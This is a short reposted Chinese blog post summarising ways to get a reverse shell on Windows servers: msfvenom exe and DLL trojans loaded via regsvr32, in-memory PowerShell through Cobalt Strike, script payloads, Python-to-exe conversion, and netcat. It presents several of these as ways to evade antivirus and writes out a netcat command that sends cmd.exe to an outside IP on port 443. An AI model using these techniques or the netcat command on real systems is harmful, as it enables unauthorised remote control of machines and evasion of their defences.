Windows反弹shell方法总结
2021-03-19 23:24
标签:服务 shell web shell反弹 str 内存 软件 exe程序 绕过 一、运行exe程序反弹shell 需要先生成exe木马,然后将exe文件上传到服务器上,最后在服务器上运行该文件。可使用msfvenom生成exe木马。 二、加载dll文件反弹shell 需要先生成dll文件,然后使用regsvr32.exe加载dll。可使用msfvenom生成dll文件。 三、PowerShell反弹shell 通过执行PowerShell代码反弹shell能有效绕过杀毒软件对拦截,因为通常将PowerShell代码直接加载到内存中,不会在磁盘上创建任何恶意文件,所以能绕过杀软的监控。可使用Cobalt Strike的Web脚本投递功能反弹shell。 四、脚本语言反弹shell 可通过运行PHP、Python、Shell等脚本语言程序反弹shell。可使用msfvenom生成各种语言的脚本程序。 五、Python脚本转换成exe反弹shell 将Python脚本转换成exe程序能有效绕过杀毒软件的检测实现免杀。 六、netcat反弹shell 在VPS上监听端口:netcat -l -p 443 在被控服务器上运行:netcat.exe -t -e cmd.exe 16.79.5.26 443 ... Windows反弹shell方法总结 标签:服务 shell web shell反弹 str 内存 软件 exe程序 绕过 原文地址:https://www.cnblogs.com/dgjnszf/p/12317025.html
文章标题:Windows反弹shell方法总结
文章链接:http://soscw.com/index.php/essay/66443.html